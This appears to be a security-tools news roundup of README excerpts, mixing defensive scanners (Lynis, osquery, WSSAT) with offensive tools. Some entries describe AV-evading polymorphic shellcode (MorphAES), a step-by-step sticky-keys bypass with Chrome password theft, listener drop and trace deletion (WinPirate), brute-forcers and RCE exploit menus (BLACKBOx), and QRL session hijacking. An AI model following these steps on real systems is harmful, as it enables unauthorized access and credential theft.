Author: Fabio Baroni http://www.pentest.guru/ @Fabiothebest89
How many times have you plugged in a USB drive and double clicked on a file without scanning for malware? I guess, MANY.

Wait A Sec!
Even if you are a security guy, you'll often be in a hurry or absent minded and you trust your USB drive (and so does your computer). What can possibly go wrong? Getting pwned is only a click away. You may have an antivirus with realtime protection, but if it doesn't have the signatures for a new virus it's very possible that it will be unnoticed and even heuristic scan may fail in detecting a new virus. Viruses are getting increasingly sophisticated.
Luckily there are services like Virus Total that allow you to scan a file with multiple antiviruses in order to increase the detection rate.
You may head over to Virus Total website and upload all the files manually one by one or you may use one of the scripts already available that allow you to check a file using Virus Total API, but this tool is unique in his genre because:

it allows to detect automatically the insertion of a new USB key
scan recursively all the files contained in the USB drive
hash the files and check them against the database of files already scanned by Virus Total
get an audio message every time a new virus is detected
automatically visualize a report in CSV format at the end of the scan

Note: although the core functions work in a crossplatform fashion, the automatic detection of a new USB key works only on Windows at the moment.

USAGE

python was.py

As simple as that. This tool has been designed with the run and forget concept in mind.
Just keep it running. You don't need to execute it every time you want to use it.

CONFIG
This tool uses a configuration file ( was-config.ini ) that allows you to specify some settings:

api-key : Virus Total api key that is necessary for the program to work
lang : language to be used for the notifications (e.g. EN, IT)
sound : enables/disables audio notifications
lock : enables/disables file-locking for files that aren't scanned yet or prove to be infected. (function not yet implemented)

DEPENDENCIES
This tool requires Python 3.x to run and requires the following modules not included in the standard library:

win32api , win32con and win32gui included in the PyWin32 package
pyglet
AVbin library necessary for playing mp3 files with pyglet

TODO

add support for more languages
implement file-locking function
implement file upload function for scanning files not already scanned by Virus Total
create Windows binary for ease of use by Windows folks
add Linux support

Download WAS

Матрёшка [mɐˈtrʲɵʂkə] is a command-line steganography tool written in pure Python. You can use it to hide and encrypt images or text in the least significant bits of pixels in an image.

Encryption
The encryption uses HMAC-SHA256 to authenticate the hidden data. Therefore the supplied MAC password is hashed with SHA-256 digest to generate the HMAC-SHA256 key. The MAC and the message data is further encrypted using the XTEA algorithm in CFB mode running 32 iterations , before beeing embedded in the image data. The SHA-256 hash for the XTEA key is created using the 128 high-order bits of the supplied password. A random 8 byte seed is used in the CFB 64 bit block cipher .

Decryption
The random seed is appended to the hidden secret and is used with the user supplied password to decrypt the hidden message using XTEA block cipher according to the encryption process. Further the decrypted secret is authenticated by comparing the embeded hmac hash with the HMAC-SHA256 of the extracted hidden message and the user supplied mac password.

Note

This is a fun project. Do not use this for serious encryption purposes!

Installation
You may want to install Matroschka in a virtualenv that has Pillow installed. Clone the repo and navigate to the root dir. That's it.

pip install Pillow
git clone git@github.com:fgrimme/Matroschka.git
cd Matroschka

Usage
Only losless image formats are supported. Therefore It is recommended to use PNG or BMP images to hide your secret. The secret can be either a text file with the .txt extension or an image with the .png extension and format.

Note: If your image contains transparent pixels, most likely artifacts will be visible after embedding data. This is caused by the manipulation of the least-significant bit in every pixels color channels.

Hide Secret

python matroschka.py -hide -m <mac-password> -k <password> <secret> <image>

Reveal Secret

python matroschka.py -open -m <mac-password> -k <password> <image>

Example
matroschka_medium.png gets hidden and encrypted in matroschka_big.png

python matroschka.py -hide -m foo -k bar resources/matroschka_medium.png resources/matroschka_big.png

Decrypting the image will save the extracted image in resources/secret-image.png

python matroschka.py -open -m foo -k bar resources/matroschka_big.png

Download Matroschka

The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.

PowerUpSQL was designed with six objectives in mind:

Easy Server Discovery: Discovery functions can be used to blindly identify local, domain, and non-domain SQL Server instances on scale.
Easy Server Auditing: The Invoke-SQLAudit function can be used to audit for common high impact vulnerabilities and weak configurations using the current login's privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information.
Easy Server Exploitation: The Invoke-SQLEscalatePriv function attempts to obtain sysadmin privileges using identified vulnerabilities.
Scalability: Multi-threading is supported on core functions so they can be executed against many SQL Servers quickly.
Flexibility: PowerUpSQL functions support the PowerShell pipeline so they can be used together, and with other scripts.
Portability: Default .net libraries are used and there are no dependencies on SQLPS or the SMO libraries. Functions have also been designed so they can be run independently. As a result, it's easy to use on any Windows system with PowerShell v3 installed.

Module Information

Author: Scott Sutherland (@_nullbind), NetSPI - 2016
Contributors: Antti Rantasaari and Eric Gruber (@egru)
License: BSD 3-Clause
Required Dependencies: None

For setup instructions, function overviews, and common usage information check out the PowerUpSQL wiki: https://github.com/NetSPI/PowerUpSQL/wiki

Download PowerUpSQL

MorphAES is the world's first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.

Properties:

Polymorphism (AES encryption)
Metamorphism (logic and constants changing)
Platform independent (Linux/BSD/Windows)
IDPS stealthing (the total number of possible signatures is more the number of atoms in the universe for one given code)
Sandbox evasion (special assembly instructions)
Realism (no null bytes)
Can produce executables (malwares)
Input code can have arbitrary length

Dependencies for the morpher:

Python 2.7 - main engine
Python Crypto 2.6 - for encryption

Dependencies for the code execution:

64-bit Intel AES-NI - for decryption

Nonetheless, there are some limitations (aka white-hat aspects):

Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
Unicode null bytes might still work (but who cares?)
It will only work on 64-bit Intel processors with AES-NI support, but since all the user's PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification, rather than a limitation, thus a 32-bit implementation is unpractical
Almost any shellcode is guarantee to work however, an arbitrary code (malware) doesn't
Windows/BSD PoC and executables are in progress...

How it works

Shellcode padding with NOPs (since AES is a block cipher)
Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) - polymorphism
Constants randomization, logic changes, instructions modification and rewriting - metamorphism

HowTo
For Linux:

sudo apt-get install python python-crypto

Execute the Pyhton script and enter your shellcode or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I'm still testing it.
You can also use the Linux PoC in assembly:

as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
./shellcode

Every file is commented and explained

Tests
At this point, it should be pretty obvious that, the hashes would be different every time, but let's compare SSDEEPes of 2 Linux executables of the same shellcode:

96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,

Well, there's something in common, but globally those are 2 different signatures, now what about the shellcode it-self:

48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,

Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as a shellcode only by 2 out of 53 antiviruses (AVG and Ikarus) on virustotal , but now, it just fails to analyze.
malwr's with cuckoo2 doesn't see anything suspicious.
On the reverser's perspective, IDA won't see anything either.
Radare2 would show the real instructions only if assembled by the assembler it-self however, it doesn't detects any crypto or suspicious activity for the executable.
Althrough, I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly...

To put it in the nutshell
Basically, it can transform a script-kid's code (or a known-one ) into a zero-day.
IDPS will fail because, it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most of the sandboxes doesn't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not.
The only way to defeat this type of shellcode/malware is to use an appropriate sandboxing or/and an AI.
Notice that, the whole execution is done by a pure assembly, no Python (or shitty OpenSSL) is needed for the shellcode's/malware's execution since, I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each-one by adapting the instructions/opcodes, but they are still same).

Notes
This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sanboxes suck.

"Tradition becomes our security, and when the mind is secure it is in decay."

Jiddu Krishnamurti

Download MorphAES

Here's the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB.
Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.
All without being detected by antivirus
we should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely

How to Use
Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)
If the computer is locked:
1) shutdown windows (make sure not hibernating by holding shift while pressing shut down)
2) hit F12 and select USB
3) sudo -i
4) fdisk -l (note: if you're on Kali Linux, run parted -l )
5) mkdir /media/windows
6) mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
7) run Stickykeys.sh
8) restart and boot to Windows
9) hit Shift 5 times fast, a command prompt will appear
10) cd to the USB and run WinPirate.bat
If the computer isn't locked:
cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds

Current Issues
1) The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn't require python to be installed on the system.
You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV
2) The sticky keys automation doesn't speed the process up as much as I previously thought, as evident by the lengthy "How to Use" section
3) I haven't been able to write any tools that grab passwords for IE or Firefox

Download WinPirate

This tool establishes SSH connections to a server, thereby enumerating through various client configurations, in order to determine whether the server allows a Diffie-Hellman (DH) key exchange based on a weak group. We hope that our tool will be useful to check SSH servers for weak DH key exchange configurations.

For further information about our tool, visit http://blog.gdssecurity.com/labs/2015/8/3/ssh-weak-diffie-hellman-group-identification-tool.html.

Installation

Requirements

This tool was tested under Ubuntu 14.04 and Mac OS X Yosemite. Although we have not tested our tool with other Linux distributions, its dependencies do not restrict its use to Ubuntu.
The setup script downloads, patches, and compiles a portable OpenSSH variant for Linux. For this process to succeed, you need to have the dependencies for compiling OpenSSH installed.
Other requirements include wget, tar, shasum, the patch tool, the bash shell, and Python 2.7 or later.
On a Debian-based system, use the following command to install dependencies:

sudo apt-get install coreutils build-essential automake patch libssl-dev python bash wget tar

Installing the aforementioned packages, might already suffice to successfully build the patched OpenSSH client. If the client fails to build due to missing dependencies, use the following command to install all build dependencies:

sudo apt-get build-dep openssh

Command

On a Linux machine change to this directory and run:

chmod +x *.sh *.py
./setup.sh

Usage

Run ./ssh-weak-dh-test.sh hostname [port]. The results are printed on stdout. More detailed results can be found in the ssh-weak-dh directory under the subfolder whose name has the form hostname-port where hostname and port are the corresponding command line parameters.
The ssh-weak-dh-test.sh script calls the analysis script ssh-weak-dh-analyze.py to analyze the results stored in the aforementioned subfolder. Our analysis script is a standalone script and can be run on a results folder as follows:

./ssh-weak-dh-analyze.py ssh-weak-dh/localhost-22

The example above analyzes the results of the scan for the SSH server running on port 22 on localhost.
WARNING: This tool tests a limited number of configurations and therefore potentially fails to detect some weak configurations. Moreover, the server possibly blocks connections before the scan completes.

As for OpenSSH servers, https://weakdh.org/sysadmin.html provides configuration suggestions.

Download SSH-Weak-DH

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!.

This sprint was mostly spent refactoring the Faraday Client, and it really payed off! Now it supports massive workspaces with over 200k hosts.

Larger workspaces are now supported

Changes

New plugin: WPscan
Major refactor of Faraday Client: now we support massive workspaces (200.000+ hosts)
Dashboard is now refreshed automatically every 60 seconds
Host Sidebar on GTK now adds information more intelligently and will never block the application
Evidence screenshots in report generation are now bigger
Added a help menu to the GTK UI
Added a help section to the WEB UI

Help panel in the WEB UI

Bug fixes

Propecia plugin
10+ minor bugs on the Web UI
Searches containing space character on Web UI
Updated URL shown when starting Faraday

The next events where you can find Faraday:
(London) https://www.blackhat.com/eu-16/arsenal.html#faraday
(Buenos Aires) https://www.ekoparty.org
(Tokio) http://en.avtokyo.org/avtokyo2016/event

We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Download Faraday

TestingWhiz is a test automation tool for web, database, cloud, mobile and web services/API testing from Cygnet Infotech. It has a codeless architecture based on FAST Automation Engine with 290+ readily available test commands that provide easy, intuitive and fast automation solution without involving programming skills.

TestingWhiz comes with great features such as inbuilt scheduler, image comparison, distributed execution, captcha automation as well as multiple browsers and language support. Plus, it has out-of-the-box integrations with bug tracking tools - Jira, Mantis & FogBugz, test management tool – HP Quality Center, CI servers – Jenkins & Bamboo and Cloud execution platforms – BrowserStack and Sauce Labs.

It uses intelligent testing techniques such as Keyword-Driven Testing, Data Driven Testing, Excel Inputs, Object Recorder and Java Scripting to help small, midsized and large-scale software companies as well as individual test engineers and QA analysts to move to the next level of hassle free test automation.

Features

FAST Automation Engine
Object Eye Record & Playback
Multiple Browsers Support
Continuous Server Integration
Integration with Atlassian JIRA, Mantis and FogBugz
Integration with HP Quality Center
Dynamic Test Data Support
Distributed Test Execution
Excel Integrations
In-built Scheduler
Image Comparison
Reports & Visual Logs
Captcha Automation
Risk-based Testing
Reusable Methods

Specifications

Application Rights: Commercial, Free Use, Periodic license, Trial

Tool Scope: Testing Tool

Testing Methods: Automatic Testing, Cloud Based Testing, Data Driven testing, Distributed testing, Functional testing, Keyword-driven testing, Regression testing, Traditional Testing

Testing Objectives: DB testing, Desktop testing, Object Based Testing, Mobile testing, Web testing, Cross-Browser testing

Operating Systems: Windows 10, Windows8, Windows 7, Windows Vista, Windows XP,

Hardware Requirements: 1 GB (2 GB Recommended), Hard Disk: 500MB

Scripting Language: Code Free, Visual Design (Scriptless)

Supported Technologies: Mobile Features, Android, Web, JavaScript, Windows GUI/Forms

Automation Tool Features: Analog View, Drag & Drop Editing, Execute with Scheduler, GUI Repository, Object Repository, Record & Playback, Test Data Tables

User Interface Available: GUI usability, Stand Alone application

System Integration support: ALM integration, Database integration, Defect Systems integration

Results Presentation: HTML Reports

Reporting Formats: HTML

Supported Browsers: Chrome, FireFox, IE, Safari

Defect Systems: Fogbugz, JIRA, Mantis

Getting Started

System Requirements

Operating System: Windows XP/ Windows Vista/ Windows 7/ Windows 8/ Windows 10

Processor: Intel Pentium 4 or later

RAM: 1 GB (2 GB Recommended)

Free Disk Space: 500 MB Java Version: JRE 7 or later

Browser Support

Internet Explorer: Version 9, 10 and 11

Mozilla Firefox: Version 3.6 to version 39

Google Chrome: Version 36 to version 43

Edge: Version 25

Apple Safari: Version 5.x

Download TestingWhiz

Password Attacks:

MD5 CRACKER
SHA1 CRACKER
SHA224 CRACKER
SHA256 CRACKER
SHA384 CRACKER
SHA512 CRACKER
MSSQL2000 CRACKER
MSSQL2005 CRACKER
MYSQL323 CRACKER
MYSQL41 CRACKER
ORACLE11 CRACKER

Web Hacking :

Wordpress Bruteforce – Bruteforce wordpress panel
FTP Bruteforce – Bruteforcing FTP LOGIN
SSH Bruteforce – Bruteforcing SSH LOGIN
Admin Page Finder – Find Admin Page
Prestashop Exploit – PrestaShop Arbitrary file Upload (6 Modules)
Dnsinfo – dns info via Yougetsignal & viewdns & hackertarget
Magento Rce – Magento eCommerce - Remote Code Execution
Joomla Rce – 1.5 - 3.4.5 remote code execution
Google Dorker – google dorker (LFI SCANNER)
Bing Dorker – bing dorker (LFI SCANNER )
Prestashop Exploit – PrestaShop Arbitrary file Upload (6 Modules)

Prerequisites:

sudo apt-get install python-passlib python-pexpect

Installation :

$ git clone https://darkeye@bitbucket.org/darkeye/blackbox.git && cd blackbox && chmod +x install && sudo ./install && cd

Version :
1.4v:

Add Prestashop Exploit
Add Admin Page finder
Add FTP Bruteforcer
Add SSH Bruteforcer
Fix google dorker

1.5v:

Fix LFI Scanner for google & bing dorker
Fix some python error
Fix Admin page finder
Fix Hash cracker

1.6v:

Fix Google Dorker
Add MSSQL2000, MSSQL2005, MYSQL323, MYSQL41, ORACLE11 CRACKER

Download BLACKBOx

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests against the security vulnerabilities. It also makes information disclosure controls. With this tool, all web services could be analysed at once and the overall security assessment could be seen by the organization.

Objectives of WSSAT are to allow organizations:

Perform their web services security analysis at once
See overall security assessment with reports
Harden their web services

WSSAT’s main capabilities include:

Dynamic Testing:

Insecure Communication - SSL Not Used
Unauthenticated Service Method
Error Based SQL Injection
Cross Site Scripting
XML Bomb
External Entity Attack - XXE
XPATH Injection
Verbose SOAP Fault Message

Static Analysis:

Weak XML Schema: Unbounded Occurrences
Weak XML Schema: Undefined Namespace
Weak WS-SecurityPolicy: Insecure Transport
Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
Weak WS-SecurityPolicy: Tokens Not Protected

Information Leakage:

Server or technology information disclosure

WSSAT’s main modules are:

Parser
Vulnerabilities Loader
Analyzer/Attacker
Logger
Report Generator

The main difference of WSSAT is to create a dynamic vulnerability management environment instead of embedding the vulnerabilities into the code.

This project has been developed as Term Project at Middle East Technical University (METU), Software Management master program.

Download WSSAT

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

When looking at the command output, it is important to note that it assumes all vulnerabilities and then selectively removes them based upon the hotfix data. This can result in many false-positives, and it is key to know what software is actually running on the target host. For example, if there are known IIS exploits it will flag them even if IIS is not running on the target host.

The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.

It was heavily inspired by Linux_Exploit_Suggester by Pentura.

Blog Post: "Introducing Windows Exploit Suggester", https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html

USAGE
update the database

$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2014-06-06-mssb.xlsx
[*] done

install dependencies
(install python-xlrd, $ pip install xlrd --upgrade)
feed it "systeminfo" input, and point it to the microsoft database

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] reading from the systeminfo input file
[*] querying database file for potential vulnerabilities
[*] comparing the 15 hotfix(es) against the 173 potential bulletins(s)
[*] there are now 168 remaining vulns
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[*] done

possible exploits for an operating system can be used without hotfix data

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2' 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 196 potential bulletins(s)
[*] there are now 196 remaining vulns
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

LIMITATIONS

Currently, if the 'systeminfo' command reveals 'File 1' as the output for the hotfixes, it will not be able to determine which are installed on the target. If this occurs, the list of hotfixes will need to be retrieved from the target host and passed in using the --hotfixes flag

It currently does not seperate 'editions' of the Windows OS such as 'Tablet' or 'Media Center' for example, or different architectures, such as Itanium-based only

False positives also occur where it assumes EVERYTHING is installed on the target Windows operating system. If you receive the 'File 1' output, try executing 'wmic qfe list full' and feed that as input with the --hotfixes flag, along with the 'systeminfo'

Download Windows-Exploit-Suggester

        .---.        .-----------
       /     \  __  /    ------
      / /     \(  )/    -----     ╔╦╗╦═╗╔═╗╦╔╦╗   ╦ ╦╦ ╦╔╗╔╔╦╗╔═╗╦═╗
     //////   ' \/ `   ---         ║║╠╦╝║ ║║ ║║───╠═╣║ ║║║║ ║ ║╣ ╠╦╝
    //// / // :    : ---          ═╩╝╩╚═╚═╝╩═╩╝   ╩ ╩╚═╝╝╚╝ ╩ ╚═╝╩╚═
   // /   /  /`    '--                         By HaHwul
  //          //..\\                         www.hahwul.com
         ====UU====UU====         https://github.com/hahwul/droid-hunter
             '//||\\`
               ''``

DROID-HUNTER

1. DROID-HUNTER
Android application vulnerability analysis and Android pentest tool

A. Support

App info check
Baksmaling android app
Decompile android app
Extract class file
Extract java code
Pattern base Information Leakage

2. How to Install?

A. Download(clone) & Unpack DROID-HUNTER

git clone https://github.com/hahwul/droid-hunter.git
cd droid-hunter

B. Install Ruby GEM

gem install html-table
gem install colorize

C. Run DROID-HUNTER

ruby dhunter.rb

3. How to Use?

Usage: ruby dhunter.rb [APK]
Command
-a, --apk : Analysis android APK file.
 + APK Analysis
   => dhunter -a 123.apk[apk file]
   => dhunter --apk 123.apk aaa.apk test.apk hwul.apk
-p, --pentest : Penetration testing Device
 + Pentest Android
   => dhunter -p device[device code]
   => dhunter --pentest device
-v, --version : Show this droid-hunter version
-h, --help : Show help page

4. Support
Contact hahwul@gmail.com

5. Screen shot

Download Droid-Hunter

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:

AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps

Determine operating system
Search for available tools and utilities
Check for Lynis update
Run tests from enabled plugins
Run security tests per category
Report status of security scan

Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:

Security auditing
Compliance testing (e.g. PCI, HIPAA, SOx)
Vulnerability detection and scanning
System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog

Upgrade note

* Lynis 2.3.4 (2016-09-27) *

Changes:
--------
* Skip update message when using the 'show' helper
* Instead of opening the log file, you can now use 'lynis show details' followed
by the test ID. It will show the relevant section.
* Several tests have extended log details
* Many style improvements as part of ongoing refactoring of the code
* Detection of nftables improved
* Replaced cut, sed, tr and others commands with binary variable (for forensics
and future intrusion checking capabilities)
* Swedish translation provided by Peter Carlsson
* Support for arch-audit to scan for presence of vulnerable packages on Arch Linux
* OS detection improved

Tests:
------
* CONT-8107 - New test checking number of Docker containers
* CRYP-7902 - Gather more details regarding certificates
* DBS-1816 - Define skip reason
* FILE-6344 - Adjusted /proc test for hidepid option
* FILE-6362 - Removed warning and add skip reason
* FIRE-4520 - Change test to use detected binary
* FIRE-4520 - New test to check for empty nftables ruleset
* KRNL-5820 - Corrected function and style improvements
* LOGG-2146 - Textual change
* NAME-4408 - Check localhost to IP mapping
* PKGS-7320 - Test for arch-audit tool
* PKGS-7322 - Check vulnerable packages on Arch Linux
* PKGS-7381 - Extended vulnerable package detection for FreeBSD
* TIME-3104 - timedatectl test now detects NTP synchronization properly

Download Lynis 2.3.4

A python framework which goal is to exploit QrlJacking attack vector easily

Installation

Requirements

Python 2.7.x
Requests
Pillow
Selenium

Installation on Windows

After downloading the framework

cd QrlJacking-Framework
pip install -r requirements.txt
python QRLJacker.py

Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/OWASP/QRLJacking
cd QrlJacking-Framework
pip install -r requirements.txt
python QRLJacker.py

Installation on OSX

git clone https://github.com/OWASP/QRLJacking

cd QrlJacking-Framework
sudo easy_install pip
sudo pip install -r requirements.txt
python QRLJacker.py

Currently QrlJacker support the following websites :
1)whatsapp
2)WeChat
3)Weibo
4)Yandex
5)Taobao
6)Taobao Trips
7)AliPay
8)Yandex Money
9)Yandex Passport
10)Airdroid
11)MyDigiPass
12)Zapper
13)Trustly App
14)Yelophone

To Do List :
1)Line
2)QQ Instant Messaging
3)QQ Mail
4)Alibaba
5)Aliexpress
6)Tmall
7)1688.com
8)Alimama
9)TenPay
10)Alibaba Yunos

Download QrlJacker

A simple tool - written in pure python - for inspecting Deep Web URLs (or onions).
Compatible with Python 2.6 & 2.7.
Author: Nikolaos Kamarinakis ( nikolaskama.me )

Installation
You can download ONIOFF by cloning the Git Repo and simply installing its requirements:

$ git clone https://github.com/k4m4/onioff.git
$ cd onioff
$ pip install -r requirements.txt

Usage
Usage: python onioff.py {onion} [options]
To view all available options run:

$ python onioff.py -h

NOTE : In order for ONIOFF to work, Tor must be correctly configured and running.

Demo
Here's a short demo:

https://nikolaskama.me/content/images/2016/09/onioff_demo.png

(For more demos click here )

Download ONIOFF

osquery is an operating system instrumentation framework for OS X and Linux.

The tools make low-level operating system analytics and monitoring both performant and intuitive.

Platform
OS X 10.9	Homepage:	https://osquery.io
OS X 10.10/11	Downloads:	https://osquery.io/downloads
CentOS 6.x	Tables:	https://osquery.io/tables
CentOS 7.x	Packs:	https://osquery.io/packs
Ubuntu 12.04	Guide:	https://osquery.readthedocs.org
Ubuntu 14.04		https://osquery-slack.herokuapp.com
Ubuntu 16.04
Windows 10

What is osquery?
osquery exposes an operating system as a high-performance relational database. This allows you to write SQL-based queries to explore operating system data. With osquery, SQL tables represent abstract concepts such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes.
SQL tables are implemented via a simple plugin and extensions API. A variety of tables already exist and more are being written: https://osquery.io/tables . To best understand the expressiveness that is afforded to you by osquery, consider the following SQL queries:
List the users :

SELECT * FROM users;

Check the processes that have a deleted executable:

SELECT * FROM processes WHERE on_disk = 0;

Get the process name, port, and PID, for processes listening on all interfaces:

SELECT DISTINCT processes.name, listening_ports.port, processes.pid
  FROM listening_ports JOIN processes USING (pid)
  WHERE listening_ports.address = '0.0.0.0';

Find every OS X LaunchDaemon that launches an executable and keeps it running:

SELECT name, program || program_arguments AS executable
  FROM launchd
  WHERE (run_at_load = 1 AND keep_alive = 1)
  AND (program != '' OR program_arguments != '');

Check for ARP anomalies from the host's perspective:

SELECT address, mac, COUNT(mac) AS mac_count
  FROM arp_cache GROUP BY mac
  HAVING count(mac) > 1;

Alternatively, you could also use a SQL sub-query to accomplish the same result:

SELECT address, mac, mac_count
  FROM
    (SELECT address, mac, COUNT(mac) AS mac_count FROM arp_cache GROUP BY mac)
  WHERE mac_count > 1;

These queries can be:

performed on an ad-hoc basis to explore operating system state using the osqueryi shell
executed via a scheduler to monitor operating system state across a set of hosts
launched from custom applications using osquery Thrift APIs

Downloads / Install
For latest stable and nightly builds for OS X and Linux (deb/rpm), as well as yum and apt repository information visit https://osquery.io/downloads . For installation information for FreeBSD, which is supported by the osquery community, see the wiki .

Building from source
Building osquery from source is encouraged! Join our developer community by giving us feedback in Github issues or submitting pull requests!

File Integrity Monitoring (FIM)
